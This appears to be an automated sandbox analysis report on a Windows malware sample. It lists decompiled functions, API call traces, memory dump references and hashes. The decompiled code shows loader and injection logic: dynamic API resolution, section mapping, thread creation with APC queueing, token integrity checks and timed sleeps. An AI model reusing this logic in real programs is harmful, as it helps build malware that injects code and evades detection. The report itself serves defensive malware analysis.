0x00381a52
0x00381a59
0x00000000
0x00000000
0x00381a60
0x00381a65
0x00000000

APIs

Part of subcall function 00381799: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,003819D3), ref: 003817A8
Part of subcall function 00381799: GetVersion.KERNEL32(?,003819D3), ref: 003817B7
Part of subcall function 00381799: GetCurrentProcessId.KERNEL32(?,003819D3), ref: 003817D3
Part of subcall function 00381799: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,003819D3), ref: 003817EC

GetSystemTime.KERNEL32(?), ref: 003819E5
SwitchToThread.KERNEL32 ref: 003819EB

Part of subcall function 0038167E: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000000,00381A05,?,00000000,?,?,?,?,?,?,?,00381A05), ref: 003816D4
Part of subcall function 0038167E: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,00381A05,00000000), ref: 00381766
Part of subcall function 0038167E: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,?,?,?,00381A05), ref: 00381781

Sleep.KERNELBASE(00000000,00000000), ref: 00381A0C
GetLongPathNameW.KERNEL32 ref: 00381A40
GetLongPathNameW.KERNEL32 ref: 00381A60
CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00381A8C
QueueUserAPC.KERNELBASE(0038133E,00000000,?), ref: 00381AA8
GetLastError.KERNEL32 ref: 00381AB8
TerminateThread.KERNEL32(00000000,00000000), ref: 00381ABF
CloseHandle.KERNEL32(00000000), ref: 00381AC6
SetLastError.KERNEL32(?), ref: 00381ACD
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00381ADA
GetExitCodeThread.KERNEL32(00000000,?), ref: 00381AEC
CloseHandle.KERNEL32(00000000), ref: 00381AF3
GetLastError.KERNEL32 ref: 00381AF7
GetLastError.KERNEL32 ref: 00381B05

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLastThread$CloseCreateHandleLongNamePathProcessVirtual$AllocCodeCurrentEventExitFreeObjectOpenQueueSingleSleepSwitchSystemTerminateTimeUserVersionWaitmemcpy
String ID:
API String ID: 2478182988-0
Opcode ID: 405834aa7933c84e6e848869d64d88157e2cbb4c40ab435a942dee9e5492a896
Instruction ID: 39635ffb84f33cff7bd44e89509e7a9de5b3497accd64a91d8aebeb44302923a
Opcode Fuzzy Hash: 405834aa7933c84e6e848869d64d88157e2cbb4c40ab435a942dee9e5492a896
Instruction Fuzzy Hash: F5314FB6901315BFDB13BFB4DC88CAE7AACEE48750B1145A5F905D6210E7348F429BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA27F7, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00BA27F7(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0xbad240);
					_v20 = 0;
					_v16 = 0;
					L00BAB048();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0xbad26c; // 0x30c
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0xbad24c = 5;
						} else {
							_t68 = E00BA5C8C(); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0xbad260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E00BA9425(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E00BA4CBE(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0xbad244);
							goto L21;
						} else {
							__eflags =  *0xbad248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E00BA5BEA();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0xbad248);
								L21:
								L00BAB048();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0xbad238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x00ba27f7
0x00ba2809
0x00ba280c
0x00ba2818
0x00ba281e
0x00ba2823
0x00ba298a
0x00ba2829
0x00ba2829
0x00ba282b
0x00ba2830
0x00ba2831
0x00ba2837
0x00ba283a
0x00ba283d
0x00ba284b
0x00ba2856
0x00ba2859
0x00ba285b
0x00ba2868
0x00ba2872
0x00ba2874
0x00ba2879
0x00ba287e
0x00ba2889
0x00ba2889
0x00ba2880
0x00ba2880
0x00ba2887
0x00000000
0x00000000
0x00ba2887
0x00ba2893
0x00000000
0x00ba2896
0x00ba289a
0x00ba28a5
0x00ba28a5
0x00ba28ac
0x00ba28b5
0x00ba28bc
0x00ba28c5
0x00ba28c8
0x00ba28cb
0x00ba28d0
0x00ba28d5
0x00000000
0x00000000
0x00ba28d7
0x00ba28da
0x00ba28dd
0x00ba28e0
0x00000000
0x00ba28e2
0x00ba28f1
0x00ba28f1
0x00000000
0x00ba291f
0x00ba291f
0x00ba2924
0x00ba2943
0x00ba2945
0x00ba294a
0x00ba294b
0x00000000
0x00ba2926
0x00ba2926
0x00ba292c
0x00000000
0x00ba292e
0x00ba292e
0x00ba2933
0x00ba2935
0x00ba293a
0x00ba293b
0x00ba2951
0x00ba2951
0x00ba2959
0x00ba2964
0x00ba2967
0x00ba2972
0x00ba2974
0x00ba2977
0x00ba2979
0x00000000
0x00ba297f
0x00000000
0x00ba297f
0x00ba2979
0x00ba292c
0x00000000
0x00ba2924
0x00ba28f4
0x00ba28f6
0x00ba28f9
0x00ba28fa
0x00ba28fa
0x00ba28fe
0x00ba2908
0x00ba2908
0x00ba290e
0x00ba2911
0x00ba2911
0x00ba2917
0x00ba2917
0x00ba2994
0x00000000

APIs

memset.NTDLL ref: 00BA280C
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00BA2818
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 00BA283D
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 00BA2859
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00BA2872
HeapFree.KERNEL32(00000000,00000000), ref: 00BA2908
CloseHandle.KERNEL32(?), ref: 00BA2917
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00BA2951
SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,00BA50A1,?), ref: 00BA2967
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00BA2972

Part of subcall function 00BA5C8C: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050A9378,00000000,?,73BCF710,00000000,73BCF730), ref: 00BA5CDB
Part of subcall function 00BA5C8C: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050A93B0,?,00000000,30314549,00000014,004F0053,050A936C), ref: 00BA5D78
Part of subcall function 00BA5C8C: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00BA2885), ref: 00BA5D8A

GetLastError.KERNEL32 ref: 00BA2984

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: de587cd6e7b520691d150795c625336a2dacdf37746cd3081d1c7ca96e904e64
Instruction ID: 0131cb8d67811bdc93090abcaf3233be84329b05a1297c0c05b46cc19fcd25ea
Opcode Fuzzy Hash: de587cd6e7b520691d150795c625336a2dacdf37746cd3081d1c7ca96e904e64
Instruction Fuzzy Hash: 62515E71809228ABDF20DF99DC45EEEBFB8EF4A720F204655F515A3150DB748A44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BA65B1, Relevance: 13.6, APIs: 9, Instructions: 72
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BA65B1(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L00BAB042();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0xbad2a4; // 0x44fa5a8
				_t5 = _t13 + 0xbae862; // 0x50a8e0a
				_t6 = _t13 + 0xbae59c; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L00BAACDA();
				_t17 = CreateFileMappingW(0xffffffff, 0xbad2a8, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}

0x00ba65b1
0x00ba65b9
0x00ba65bd
0x00ba65c3
0x00ba65c8
0x00ba65cd
0x00ba65d0
0x00ba65d3
0x00ba65d8
0x00ba65d9
0x00ba65dc
0x00ba65e1
0x00ba65e8
0x00ba65f2
0x00ba65f4
0x00ba65f5
0x00ba65f8
0x00ba6614
0x00ba661a
0x00ba661e
0x00ba666c
0x00ba6620
0x00ba662d
0x00ba663d
0x00ba6645
0x00ba6657
0x00ba665b
0x00000000
0x00000000
0x00ba6647
0x00ba664a
0x00ba664f
0x00ba6651
0x00ba6651
0x00ba662f
0x00ba6631
0x00ba665d
0x00ba665e
0x00ba665e
0x00ba662d
0x00ba6673

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,00BA4F74,?,?,4D283A53,?,?), ref: 00BA65BD
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00BA65D3
_snwprintf.NTDLL ref: 00BA65F8
CreateFileMappingW.KERNELBASE(000000FF,00BAD2A8,00000004,00000000,00001000,?), ref: 00BA6614
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BA4F74,?,?,4D283A53), ref: 00BA6626
MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00BA663D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00BA4F74,?,?), ref: 00BA665E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00BA4F74,?,?,4D283A53), ref: 00BA6666

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1814172918-0
Opcode ID: 678088218fdd946e4b3f8bc3ec4f267c676717aeef3c6fe08b7153071c42736b
Instruction ID: df8143fa0c2026f676d0f1021a4839b9953890ab1283c0006f55141c4c7ed116
Opcode Fuzzy Hash: 678088218fdd946e4b3f8bc3ec4f267c676717aeef3c6fe08b7153071c42736b
Instruction Fuzzy Hash: D121F0B6644208BBD321ABA8DC06FCE7BE9EB46710F2400A0F605E71D0EF70D900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1000, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60
sleepmemorytimeCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00BA1000(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xbad238 = _t10;
				if(_t10 != 0) {
					 *0xbad1a8 = GetTickCount();
					_t12 = E00BA9864(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L00BAB1A6();
							_t33 = _t14 + _t16;
							_t18 = E00BA904C(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E00BA928F(_t25) != 0) {
							 *0xbad260 = 1; // executed
						}
						_t12 = E00BA4EE5(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}

0x00ba1000
0x00ba1006
0x00ba1007
0x00ba1013
0x00ba1019
0x00ba1020
0x00ba1030
0x00ba1035
0x00ba103c
0x00ba103e
0x00ba1043
0x00ba1049
0x00ba104f
0x00ba1059
0x00ba105d
0x00ba105f
0x00ba1064
0x00ba1065
0x00ba1066
0x00ba106b
0x00ba1071
0x00ba107a
0x00ba107b
0x00ba1080
0x00ba1086
0x00ba1092
0x00ba1094
0x00ba1094
0x00ba109e
0x00ba109e
0x00ba1022
0x00ba1024
0x00ba1024
0x00ba10a8

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00BA91B4,?), ref: 00BA1013
GetTickCount.KERNEL32 ref: 00BA1027
GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00BA91B4,?), ref: 00BA1043
SwitchToThread.KERNEL32(?,00000001,?,?,?,00BA91B4,?), ref: 00BA1049
_aullrem.NTDLL(?,?,00000009,00000000), ref: 00BA1066
Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,00BA91B4,?), ref: 00BA1080

Strings

twU, xrefs: 00BA1030

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
String ID: twU
API String ID: 507476733-3620099028
Opcode ID: 1856dd11b093512d555d47db66708b98cc672efe5dcc04f90b7514f7775d0227
Instruction ID: 9270f05be5a88df2306d7cb0a3d426d5d4473e1efcc6631f4c7af00e7a5dfaff
Opcode Fuzzy Hash: 1856dd11b093512d555d47db66708b98cc672efe5dcc04f90b7514f7775d0227
Instruction Fuzzy Hash: 82115272A48300BBE770AB68DC0BB6A3AE8EB46790F100559FA45D7291EEB4D8408655

Uniqueness

Uniqueness Score: -1.00%

Function 00BA6B7B, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00BA6B7B(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xbad25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00BA8D59(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00BA677C(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x00ba6b88
0x00ba6b8f
0x00ba6b96
0x00ba6baa
0x00ba6bb5
0x00ba6bcd
0x00ba6bda
0x00ba6bdd
0x00ba6be2
0x00ba6bed
0x00ba6bf1
0x00ba6c00
0x00ba6c04
0x00ba6c20
0x00ba6c20
0x00ba6c24
0x00ba6c24
0x00ba6c29
0x00ba6c2d
0x00ba6c33
0x00ba6c34
0x00ba6c3b
0x00ba6c41

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00BA6BAD
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00BA6BCD
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00BA6BDD
CloseHandle.KERNEL32(00000000), ref: 00BA6C2D

Part of subcall function 00BA8D59: RtlAllocateHeap.NTDLL(00000000,00000000,00BA9099), ref: 00BA8D65

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00BA6C00
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00BA6C08
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00BA6C18

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 2f64cc487ab573c7b01a7f356a1fc0d705e994a2115cd67019d980ad4896b3bd
Instruction ID: 1dbb186fc805471a0457017aec77313da25c9c6a6aa7fa9623f963e483cc942c
Opcode Fuzzy Hash: 2f64cc487ab573c7b01a7f356a1fc0d705e994a2115cd67019d980ad4896b3bd
Instruction Fuzzy Hash: 84214AB5904208FFEB10AFA4DC45EAEBBB9EB4A314F0040A5E911A21A1DB718A05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00381CF0, Relevance: 10.6, APIs: 7, Instructions: 74
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			_entry_(void* __ecx, intOrPtr _a4, long _a8, intOrPtr _a12) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x384108);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x38410c;
						if( *0x38410c != 0) {
							_t36 = 0x2710;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x384118;
								if( *0x384118 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x38410c);
						}
						HeapDestroy( *0x384110);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x384108) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x384110 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x384130 = _a4;
							asm("lock xadd [eax], ebx");
							_t23 = CreateThread(0, 0, E00381C56, E00381561(_a12, 0, 0x384118, _t41), 0,  &_a8); // executed
							 *0x38410c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x00381cf3
0x00381cff
0x00381d01
0x00381d04
0x00381d7e
0x00381d84
0x00381d86
0x00381d88
0x00381d8e
0x00381d90
0x00381d95
0x00381d98
0x00381da3
0x00381da5
0x00000000
0x00000000
0x00381da7
0x00381daa
0x00381dac
0x00000000
0x00000000
0x00000000
0x00381dac
0x00381db4
0x00381db4
0x00381dc0
0x00381dc0
0x00381d06
0x00381d07
0x00381d27
0x00381d2d
0x00381d32
0x00381d34
0x00381d74
0x00381d74
0x00381d36
0x00381d3e
0x00381d45
0x00381d5e
0x00381d64
0x00381d6b
0x00381d70
0x00000000
0x00381d70
0x00381d6b
0x00381d34
0x00381d07
0x00381dcd

APIs

InterlockedIncrement.KERNEL32(00384108), ref: 00381D12
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00381D27
CreateThread.KERNEL32(00000000,00000000,00381C56,00000000,00000000,?), ref: 00381D5E
InterlockedDecrement.KERNEL32(00384108), ref: 00381D7E
SleepEx.KERNEL32(00000064,00000001), ref: 00381D98
CloseHandle.KERNEL32 ref: 00381DB4
HeapDestroy.KERNEL32 ref: 00381DC0

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

Associated: 00000001.00000002.1026960065.0000000000385000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateHeapInterlocked$CloseDecrementDestroyHandleIncrementSleepThread
String ID:
API String ID: 3416589138-0
Opcode ID: ef7a9c60dcf0eaef54912c07810dadac70f3ec5b6769f87ae6bbad82a84368bf
Instruction ID: 4ba39baf91b5bf9556ec378408568dc40c7f31b7c196e6a70817be06f21d4414
Opcode Fuzzy Hash: ef7a9c60dcf0eaef54912c07810dadac70f3ec5b6769f87ae6bbad82a84368bf
Instruction Fuzzy Hash: FE21C371A00305AFC713AF69EC88A797BBCFBA6B60B1145E9F406D3750E7308E458B50

Uniqueness

Uniqueness Score: -1.00%

Function 00BA9561, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 00BA959C
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 00BA961F
StrStrIW.SHLWAPI(00000000,006E0069), ref: 00BA965F
SysFreeString.OLEAUT32(00000000), ref: 00BA9681

Part of subcall function 00BA2CC3: SysAllocString.OLEAUT32(00BAC2A8), ref: 00BA2D13

SafeArrayDestroy.OLEAUT32(00000000), ref: 00BA96D4
SysFreeString.OLEAUT32(00000000), ref: 00BA96E3

Part of subcall function 00BA3651: Sleep.KERNELBASE(000001F4), ref: 00BA3699

Memory Dump Source

Source File: 00000001.00000002.1027366115.0000000000BA1000.00000020.00000001.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000001.00000002.1027359553.0000000000BA0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027383869.0000000000BAC000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.1027390265.0000000000BAD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.1027399493.0000000000BAF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: 49bcfdc0259f239b30fe24e88a1f097319110f305c7c2de7af1e2ceffa3d4ef3
Instruction ID: 396244b2822a0aebb111056a54b394837668aae865027ffa263af6f922dcec26
Opcode Fuzzy Hash: 49bcfdc0259f239b30fe24e88a1f097319110f305c7c2de7af1e2ceffa3d4ef3
Instruction Fuzzy Hash: 52513B35504609EFDB11DFA8C844A9EB7F6FF89700B158869F915EB224DB31ED05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003818E1, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E003818E1(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00381669(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t48 = GetModuleHandleA( *0x384144 + 0x385014);
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48,  *0x384144 + 0x38514c);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00381E78(_t54);
					} else {
						_t32 = GetProcAddress(_t48,  *0x384144 + 0x38515c);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t35 = GetProcAddress(_t48,  *0x384144 + 0x38516f);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t38 = GetProcAddress(_t48,  *0x384144 + 0x385184);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t41 = GetProcAddress(_t48,  *0x384144 + 0x38519a);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00381DD0(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x003818f0
0x003818f4
0x003819b6
0x003818fa
0x00381912
0x00381921
0x00381928
0x0038192a
0x0038192f
0x003819ae
0x003819af
0x00381931
0x0038193e
0x00381940
0x00381945
0x00000000
0x00381947
0x00381954
0x00381956
0x0038195b
0x00000000
0x0038195d
0x0038196a
0x0038196c
0x00381971
0x00000000
0x00381973
0x00381980
0x00381982
0x00381987
0x00000000
0x00381989
0x0038198f
0x00381994
0x0038199b
0x003819a0
0x003819a5
0x00000000
0x003819a7
0x003819aa
0x003819aa
0x003819a5
0x00381987
0x00381971
0x0038195b
0x00381945
0x0038192f
0x003819c4

APIs

Part of subcall function 00381669: HeapAlloc.KERNEL32(00000000,?,00381C8C,00000208,?,00000000,?,?,?,00381A31,?), ref: 00381675

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00381EB7,?,?,?,?,00000002,?,003813E9), ref: 00381906
GetProcAddress.KERNEL32(00000000,?), ref: 00381928
GetProcAddress.KERNEL32(00000000,?), ref: 0038193E
GetProcAddress.KERNEL32(00000000,?), ref: 00381954
GetProcAddress.KERNEL32(00000000,?), ref: 0038196A
GetProcAddress.KERNEL32(00000000,?), ref: 00381980

Part of subcall function 00381DD0: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,73B74EE0,00000000,00000000,?), ref: 00381E2D
Part of subcall function 00381DD0: memset.NTDLL ref: 00381E4F

Memory Dump Source

Source File: 00000001.00000002.1026915987.0000000000380000.00000040.00020000.sdmp, Offset: 00380000, based on PE: true

